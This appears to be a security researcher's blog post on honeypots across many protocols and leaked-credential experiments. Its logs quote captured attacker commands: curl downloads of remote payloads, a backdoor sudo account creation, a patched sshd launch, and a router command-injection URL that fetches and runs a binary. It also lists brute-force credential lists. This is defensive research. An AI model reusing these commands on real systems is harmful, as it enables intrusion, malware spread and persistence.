Tasting the Honey(pot)
Simple Google-dorking will reveal tens of thousands of leaked credentials for multiple services, machine logins, email addresses, social media accounts, software license keys and pretty much anything that can grant identity. Even with Google’s attempts to skip indexing this data and masking sensitive information, there are thousands of pages found across paste sites and forums. This number grows significantly when using non-mainstream search engines. Given that a sizable amount of social media traffic and the overwhelming majority of general internet traffic is generated by bots/botnets that need some sort of identity to operate on these platforms and tend to takeover accounts to continue their campaigns, it is crucial to understand how these automated entities propagate themselves across applications and protocols.
This is where the concept of a honeypot comes in. The general idea is that we intentionally leak a part of, or all of a credential to some service to see how and where it is picked up and what is done with it. Beyond just credentials, these solutions are used to also understand tooling that is being used by bad actors or automated entities for scanning, payload generation, payload delivery and to observe interaction/behaviour.
Server overview
After initially testing multiple honeypot software on my local systems and messing around with port forwarding and containers, I realized that servers in multiple geographies would naturally attract more traffic. I spun up ~12 servers across multiple countries with varying specs, based on the services they were running. Most of the tools I used are listed in the {awesome-honeypots} project.
SSH
(remote access)
By far the most commonly enumerated protocol, TCP/22 was being enumerated within minutes of the server being up.
Within the first 48 hours alone:
Distribution of IP addresses (top 10):
grep "New connection" *.log | cut -d ' ' -f 5 | cut -d ':' -f 1 | sort | uniq -c | sort -nr
15046 23.153.232.26
30 185.224.128.34
29 157.230.80.76
19 122.171.18.122
17 171.221.205.30
17 122.171.19.21
12 115.241.74.34
7 121.143.130.12
6 59.4.213.254
6 220.82.240.49
... 153 more rows
Count of unique IP addresses:
grep "New connection" *.log | cut -d ' ' -f 5 | cut -d ':' -f 1 | sort | uniq -c | sort -nr | wc -l
showed 162
unique IP addresses.
Count of unauthorized login events:
grep "unauthorized login" *.log | wc -l
showed 15643
events.
Distribution of SSH client software:
grep "Remote SSH version" *.log | cut -d ' ' -f 6 | sort | uniq -c | sort -nr
15133 SSH-2.0-Go
93 SSH-2.0-OpenSSH_6.0p1
33 SSH-2.0-ZGrab
30 SSH-2.0-libssh2_1.10.0
27 SSH-2.0-OpenSSH_8.9p1
10 SSH-2.0-OpenSSH_9.0
10 SSH-2.0-OpenSSH_7.9p1
7 SSH-2.0-libssh_0.7.4
6 SSH-2.0-OpenSSH_8.4p1
3 SSH-2.0-makiko
3 SSH-2.0-libssh2_1.9.0
3 SSH-2.0-OpenSSH_7.4
2 SSH-2.0-paramiko_2.11.0
2 GET
1 SSH-2.0-OpenSSH_9.3
1 MGLNDD_3.111.217.202_22
1 MGLNDD_3.111.187.169_22
1 MGLNDD_18.223.119.164_22
1 MGLNDD_13.127.128.240_22
Distribution of usernames attempted:
grep "login attempt" *.log | cut -d ' ' -f '5' | cut -d "'" -f 2 | sort | uniq -c | sort -nr
15176 root
211 admin
54 pi
47 ubnt
15 sudev
12 usr
10 super
10 default
9 ubuntu
9 support
9 Admin
8 ftp
7 telnet
6 zyfwp
6 vadmin
6 sFTPUser
6 root1
6 hikvision
6 ec2-user
5 user
5 oracle
4 adtecftp
3 www
3 web
3 posiflex
3 ont
2 vagrant
2 test
2 remotessh
2 postgres
2 os
2 jenkins
2 hello
2 git
2 fliruser
2 esuser
2 es
2 aws
2 ansible
2 adtec
2 1234
1 useradmin
1 john
1 guest
1 fedora
1 devops
1 butter
1 anonymous
1 administrator
1 123456
Count of unique passwords attempted:
grep "login attempt" *.log | cut -d ' ' -f '5' | cut -d "'" -f 4 | sort | uniq -c | sort -nr | wc -l
gave 15158
Distribution of passwords attempted (top 20):
grep "login attempt" *.log | cut -d ' ' -f '5' | cut -d "'" -f 4 | sort | uniq -c | sort -nr | head -n 20
54 123456
38
26 root
24 admin
24 1234
22 password
14 0
13 raspberry
13 12345
12 test123
12 Admin123
12 Admin
11 asdf
11 admin1234
11 123
10 inflection
10 admin123!@#
9 root123
9 admin123456
9 111111
What happens upon successful login?
A few of the commands that were run:
grep -vi "Connection lost" *.log | grep -v "unauthorized login" | grep -v "Remote SSH version" | grep -v "NEW KEYS" | grep -v "login attempt" | grep -v "trying auth" | grep -v "outgoing" | grep -v "incoming" | grep -v "kex alg" | grep -v "SSH client" | grep -v "New connection" | grep -v "starting service" | grep -v "failed auth" | grep -v "Could not read" | cut -d ']' -f 2 | less
Clearly, someone is trying to run an executable. Very commonly spammed:
CMD: ./oinasf; dd if=/proc/self/exe bs=22 count=1 || while read i; do echo $i; done < /proc/self/e
xe || cat /proc/self/exe;
In another case, some connections triggered SFTP-write of a malicious/patched sshd
executable followed by:
dispatching: INIT requestId=3
dispatching: MKDIR requestId=1
SFTP makeDirectory: b'./.6260608818804882209'
dispatching: OPEN requestId=2
SFTP openFile: b'./.6260608818804882209/sshd'
dispatching: WRITE requestId=3
adding 65708 to 65364 in channel 0
dispatching: WRITE requestId=4
dispatching: WRITE requestId=5
...
dispatching: WRITE requestId=735
...
SFTP Uploaded file "sshd" to ./downloads/c589ea48755c88a02e6b15df979f85006d5572c47888
740877630c53779750c6
followed by a logout and login:
avatar root logging out
b'root' authenticated with b'password'
followed by:
CMD: echo 1 && cat /bin/echo
CMD: nohup $SHELL -c "curl http://168.119.173.48:60142/linux -o /tmp/ABO2MG1QGA; if [ ! -f /tmp/AB
O2MG1QG
CMD: head -c 2344348 > /tmp/DEsmkDf8HO
Received unhandled keyID: b'\x00'
Received unhandled keyID: b'\x00'
Received unhandled keyID: b'\x00'
...
<logout>
In some cases, after the patched sshd
executable was written, the following was executed:
chmod +x ./.8278773721751228781/sshd;nohup ./.8278773721751228781/sshd 191.252.204.41 5.42.73.122 162.240.149.176 202.133.88.34 111.74.23.213 112.4.238.226 89.116.73.228 117.250.10.204 122.228.207.106 37.60.225.36 107.172.84.105 60.13.37.55 193.203.161.58 159.203.68.250 117.161.233.102 164.92.166.153 95.164.33.119 116.103.228.45 222.77.96.7 18.139.171.248 143.198.110.204 222.186.3.91 107.174.250.150 61.185.15.118 125.122.27.208 193.169.244.205 77.91.78.243 125.220.195.10 18.61.211.205 202.5.16.82 37.58.18.181 92.246.91.100 62.72.1.151 59.38.100.77 125.124.179.148 37.58.18.246 88.218.249.242 221.181.168.32 222.77.96.50 120.71.183.216 125.124.199.57 143.178.159.78 216.181.107.48 114.236.138.231 158.51.96.38 131.153.225.186 80.151.78.147 51.79.230.233 192.227.148.214 221.229.107.155 61.164.145.11 &
nohup <the list above>
It is interesting that a lot of these agents do not try to take over the account entirely. They opportunistically use the credentials to propagate malware.
Some other commands included:
/ip cloud print
ifconfig
uname -a
cat /proc/cpuinfo
ps -ef
ps | grep '[Mm
who
uptime
echo -e "\x6F\x6B"
ls -la /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/
smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
nohup $SHELL -c "curl http://43.132.150.184:60134/linux -o /tmp/AhjLPQOFR9; if [ ! -f /tmp/AhjLPQOFR9'
apt update && apt install sudo curl -y && sudo useradd -m -p $(openssl passwd
-1 9rDYBD6Z) system && sudo usermod -aG sudo system
openssl passwd -1 9rDYBD6Z
sudo useradd -m -p system
sudo usermod -aG sudo system
Clearly, there is a large repository of persistence and priv-esc methods and system-recon we can learn from here. Just a reminder: the data above is from only the first 48 hours.
FTP
(file server)
Within the first 48 hours alone:
Surprisingly, not a lot of activity here.
Distribution of IP addresses:
cat log*/ftp* | grep "cmd': 'AUTH" | cut -d ':' -f 10 | cut -d ',' -f 1 | sort | uniq -c | sort -nr
4 '64.62.197.105'
4 '205.210.31.194'
4 '198.235.24.16'
4 '198.235.24.143'
4 '198.235.24.142'
4 '192.241.222.77'
4 '107.170.224.58'
2 '87.236.176.185'
2 '87.236.176.181'
2 '205.210.31.149'
2 '198.235.24.248'
2 '104.152.52.129'
Distribution of commands issued:
cat log*/ftp* | grep "cmd" | cut -d ':' -f 8 | sort | uniq -c | sort -nr | cut -d ',' -f 1
38 'AUTH'
14 'USER'
12 'SYST'
12 'PASS'
8 'TYPE'
8 'LIST'
4 'QUIT'
2 '\x03 *%À COOKIE
There were 2 LIST
operations performed, both with the argument home/ftp/db.txt
.
Telnet
(remote access)
Within the first 24 hours alone:
Count of unique IP addresses (top 10):
cat telnet* | sed s/\'/\"/g | jq ".src_ip" | sort | uniq -c | sort -nr
339 "117.235.230.152"
61 "85.204.215.57"
10 "36.111.149.84"
6 "123.154.252.138"
2 "222.189.105.241"
1 "95.189.48.180"
1 "92.46.224.46"
1 "92.15.182.194"
1 "91.92.252.209"
1 "89.248.162.159"
Distribution of usernames attempted (Top 10):
cat telnet* | sed s/\'/\"/g | jq 'select(.action=="login") | .username' | sort | uniq -c | sort -nr
113 "root"
49 "admin"
7 "guest"
4 "supervisor"
3 "user"
3 "888888"
2 "ubnt"
2 "tech"
2 "support"
2 "service"
Distribution of passwords attempted (top 20):
cat telnet* | sed s/\'/\"/g | jq 'select(.action=="login") | .password' | sort | uniq -c | sort -nr | head -n 20
9 "12345"
8 "password"
8 "admin"
8 "1234"
6 "user"
5 "aquario"
5 "888888"
5 "54321"
5 "1234567890"
5 ""
4 "pass"
4 "Win1doW$"
4 "7ujMko0admin"
4 "666666"
4 "5up"
4 "123456"
3 "zsun1188"
3 "zhongxing"
3 "xmhdipc"
3 "ttnet"
HTTP and HTTPS
(web server)
Within the first 24 hours alone:
Distribution of request type:
cat http* | sed s/\'/\"/g | jq '.action' | sort | uniq -c | sort -nr
875 "GET"
104 "POST"
42 "HEAD"
Distribution of request URIs:
cat http* | sed s/\'/\"/g | jq '.data.uri' | sort | uniq -c | sort -nr
236 "/"
96 "/.env"
36 "/Core/Skin/Login.aspx"
18 "/favicon.ico"
12 "/test"
10 "/robots.txt"
8 "/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+
%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+
shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk)"
6 "example.com:80"
6 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
6 "/upl.php"
6 "/systembc/password.php"
6 "/sitemap.xml"
6 "/password.php"
6 "/info.php"
6 "/geoip/"
6 "/form.html"
6 "/files/"
6 "/bundle.js"
6 "/1.php"
6 "/.well-known/security.txt"
6 "/.git/config"
6 "/sugar_version.json"
.. and many, many more.
The request to the particularly interesting URI
/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk)
had the user agent: Root Sl*t
(censored).
I looked through a lot of methodology for recon, propagation and persistence and found that due to mainstream providers (ex. Google) having practices such as mandatory recovery setup and activity notifications, ‘disposable’ and non-mainstream providers are of significant interest to the entities looking for addresses. I created many, many accounts across providers and started to leak them across paste sites, forums and social media and was surprised at the near-instant attempts at brute-force logins. After reading multiple reports on malware and humans that try to covertly use leaked credentials, I found that many intend to use the credential as long as possible without raising any alarms, i.e. simply start using the account without taking it over (which would naturally force the owner to reset it). A similar pattern can be seen with the SSH honeypot earlier in the article. After login, there is an immediate attempt to install malware and execute rather than to change the key and fully own the user. This opportunistic approach makes sense since most of these accounts are ‘disposable’ or ‘use-and-abandon’ and are not the go-to choice for most people’s main identity, and from a bad actor’s point of view, immediate use is more valuable than the risk and effort of reset. The rate of a user actually checking these accounts is quite low, and the rate of abandonment (as long as there is no ‘reset notification’) is quite high. And so, I started leaking the password along with the email address, to see the SSH equivalent of the ‘commands executed’.
Many accounts were taken over (password changed and I lost access), however, for the accounts that were logged into without password change, a large number of sign-ups to social media, chat sites, pastebins and interaction services occurred. Some accounts started sending out phishing/spam/advertisement email. Some accounts started sending out and receiving email addresses, IP addresses and social media handles to/from other email addresses, pastebin links and anonymous note-URLs - possibly bots/botmasters or human operators trying to collect and share details to further escalate interaction. I wanted to see what actually happens on those social media accounts, but attempts at logging into them from my device resulted in account-block from the platform, likely due to spam detection (logins from different IP, scraping, rapid interactions etc.) even across multiple networks (home, proxy, etc.). The timing of the messages was sporadic and the number of social media handles and email addresses sent per file varied. Some usernames obviously indicated humans and were mostly used for free software trials, website sign-ups and social media applications, however, many usernames seemed to follow a pattern, likely part of a botnet.
Note: I visited some of the social media profiles that were being collected and transferred and they seemed to belong to real people. Perhaps these handles and email addresses were farmed through an operator/bot interacting with real people and sent to a botmaster or another operator. I will not be posting any of their usernames or email addresses and have deleted/disposed of the accounts.
LDAP
(directory services)
Within the first 48 hours alone:
Count of unique IP addresses (top 10):
cat log*/ldap* | sed s/\'/\"/g | jq ".src_ip" | sort | uniq -c | sort -nr | head -n 10
20 "71.174.241.122"
6 "117.247.23.204"
4 "8.213.129.112"
2 "45.83.66.216"
2 "45.83.64.112"
2 "45.33.80.243"
2 "205.210.31.6"
2 "205.210.31.48"
2 "205.210.31.3"
2 "205.210.31.177"
2 "205.210.31.16"
I ran a low interaction solution for LDAP and might explore a more sophisticated solution in the future.
SMB
(network file shares)
Within the first 24 hours alone:
Count of unique IP addresses (top 10):
cat log*/smb* | sed s/\'/\"/g | jq ".src_ip" | sort | uniq -c | sort -nr | head -n 10
336 "213.6.17.78"
178 "59.153.18.93"
156 "182.78.227.58"
94 "182.239.114.72"
14 "95.181.128.134"
6 "191.33.93.162"
6 "171.224.180.227"
6 "125.162.237.19"
6 "103.183.240.2"
5 "123.25.115.28"
Distribution of workgroup names attempted:
cat log*/smb* | sed s/\'/\"/g | jq ".data" | grep -v "Incoming connection" | cut -d ' ' -f 2 | sort | uniq -c | sort -nr
188 (domainname\\administrator,LOCALPCNAME)"
158 (WORKGROUP\\Administrator,WIN-48Q9KQD852D)"
102 (\\for,)"
102 (\\accounts,)"
78 (\\사용자,)"
74 (\\User,)"
58 (\\\\\\,)"
44 (\\,)"
24 \\
18 (\\계정,)"
10 .\\
2 (\\GUEST,)"
2 (WORKGROUP\\,WINDOWS)"
IPP
(printing over the internet)
I ran a low interaction honeypot for this protocol and received a few scan requests from CensysInspect/1.1
to POST /ipp
and a few requests with the following payload:
VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://54.151.110.227:631/ipp|ATTR requested-attributes all
MSSQL and MySQL
(database servers)
Within the first 24 hours alone:
Count of unique IP addresses (top 10):
cat log*/mssql* | sed s/\'/\"/g | jq 'select(".action==connection") | .src_ip' | sort | uniq -c | sort -nr | head -n 10
455 "58.210.84.206"
275 "223.68.154.158"
171 "128.65.181.53"
44 "36.134.98.177"
8 "121.28.0.62"
2 "60.1.128.255"
2 "45.250.231.106"
2 "45.201.132.128"
2 "41.205.56.191"
2 "23.224.97.225"
I also noticed a lot of password spraying with the username sa
and 468
passwords. Some examples are below:
"P@$$w0rd"
"Heaven"
"Douglas1"
"Dennis"
"Aa12345678"
"Aa123456"
"ALEX"
"ABCabc123"
"A123456"
"88888888"
"62 35 61 38 61 63 36 66 38 30 35 39 36 34 31 31 33 34 32 32 37 3"
"6105"
"5201314"
"4yqbm4,m`~!@~#$%^&*(),.;"
MySQL had similar characteristics, with the addition of a few interesting usernames:
\x17a-ٸe
TL'W{\x12^
)\x08і
.3K
J+,
PJL
(printer and host communication protocol)
A low interaction solution, however, a few interesting commands were submitted:
"@PJL INFO ID\r\n\r\n"
"@PJL INFO ID\r\n\r\n"
"@PJL INFO ID\r\n\r\n"
"@PJL INFO STATUS\n@PJL INFO ID\n"
"GET / HTTP/1.1\r\nHost: 13.233.138.158:9100\r\nAccept: */*\r\nConnection: close\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36\r\n\r\n"
"GET / HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36\r\nAccept-Language: en-US,en;q=0.9\r\nConnection: close\r\nHost: 54.151.110.227:9100\r\n\r\n"
"GET / HTTP/1.1\r\nUser-Agent: curl/7.29.0\r\nHost: 13.233.138.158\r\nAccept: */*\r\n\r\n"
"HELPREDIS\r\ninfo\r\n"
"User User\r\n"
Elastic
(document indexing and search engine)
A low interaction solution here as well, however, a few interesting requests were seen:
"GET / HTTP/1.0\r\n"
"GET / HTTP/1.1\r\n"
"GET /?CAVIT HTTP/1.1\r\n"
"GET /_search HTTP/1.1\r\n"
"GET /api HTTP/1.0\r\n"
"GET /hazelcast/rest/cluster HTTP/1.0\r\n"
"GET /nice%20ports%2C/Tri%6Eity.txt%2ebak HTTP/1.0\r\n"
"GET /server-info HTTP/1.1\r\n"
"GET /version HTTP/1.1\r\n"
The problem remains
As we can see, the number of bots AND humans attempting to gain an identity or an account is massive. IPv4 space is continuously being port scanned and web-content is continuously being searched and indexed. There are countless forums giving out thousands of credentials and keys of all types, sometimes free, sometimes paid on the general internet which show up on the first page of Google itself. Once again, the actual number of sites discovered grows exponentially with alternative search engines.
I also found multiple open-source and readily available tools that create addresses in bulk while avoiding abuse detection. Many online forums and open-source tools also present out-of-box solutions that trivially bypass limitations on fetching and sending email programmatically via API or through IMAP/SMTP libraries through the use of browser automation. This implies that bots and human operators can readily create addresses in bulk with a relatively low barrier to entry.
With the boundaries between bad-actors, bots and genuine users getting more blurry by the day, attacks are becoming more sophisticated and covert. Password breach detection solutions such as haveibeenpwned
are at the forefront of user notification in context of organization breach, however, we need systems that can scan the IPv4 space and web to lower the rate of identity compromise and malicious activity, and minimize the time to notification.
What’s next?
Further analysis of bot/human behaviour in credential search
In the shortest case, an SSH login was picked up within 2 minutes of being posted to a paste site. Scrapers or human operators might choose to try credentials based on the manner of presentation of the information. It would be interesting to see how scrapers/humans behave in combinations of the following variables:
- one-address leaks
- multiple-address leaks
- some credentials working
- all credentials working
- no credentials working
- timer on the content
Research on honeypot detection is becoming popular, and will further lead to smarter honeypots.
Further analysis of account recovery mechanism vs. takeover
Initially, many accounts were logged into and had their password changed, at which point, I lost access since I did not set any recovery mechanism. With a recovery email set, it got better, but still, many a time it was unset and I lost access again. However, after setting less common recovery methods such as phrases/key-files, relatively fewer takeovers occurred. Given that recovery email/phone numbers are the most common methods used, they are presented front and center and may clearly direct actions of a bad actor once taken over. For example, a recovery email may be deleted since the attacker already knows the password and is in the account. However, lesser used mechanisms such as phrases/key-files or device-binding being presented in different UI sections altogether seems to do a better job of not being overridden. There should be user awareness generated about these mechanisms as stronger alternatives.
Can we predict usernames and addresses that bots will use to intercept info or thwart networks?
It would also be of interest to see the pattern of usernames being used and to try and take up the address space or intercept the process. Bot detection on social media sites is a big problem, and maybe creating accounts or blocking predictable usernames after a naming-pattern with bots has been established could help. What’s more interesting is, given the fact that a lot of modern malware, botnets and human operators use social media as C&C, would creating accounts based on a username pattern lead us to pings/beacons from the ‘real’ bots or the ‘real’ human operators? There is some academic and hobbyist research on this area, but it seems to be in its early stages. A very interesting rabbit hole to go down.
Leak discovery and improved awareness
I have additional research ongoing regarding content discovery and will be writing that up soon. It would be nice to have a service that will monitor email leaks and inform users across multiple mediums. Password breach detection services such as haveibeenpwned
are quite popular, however, I have not come across any that scrape the general internet or IPv4 port-space looking for leaks. Informing the user can lead to improved awareness and lower the chance of a phishing/spam/scam campaign. I also intend to search alternative networks for this, namely IPFS.
Note: all the opinions presented in this article are purely my own and do not represent any other entity. All the tools and techniques I have described here are for research purposes. Do not attempt to scan or log into an account or service that you do not own.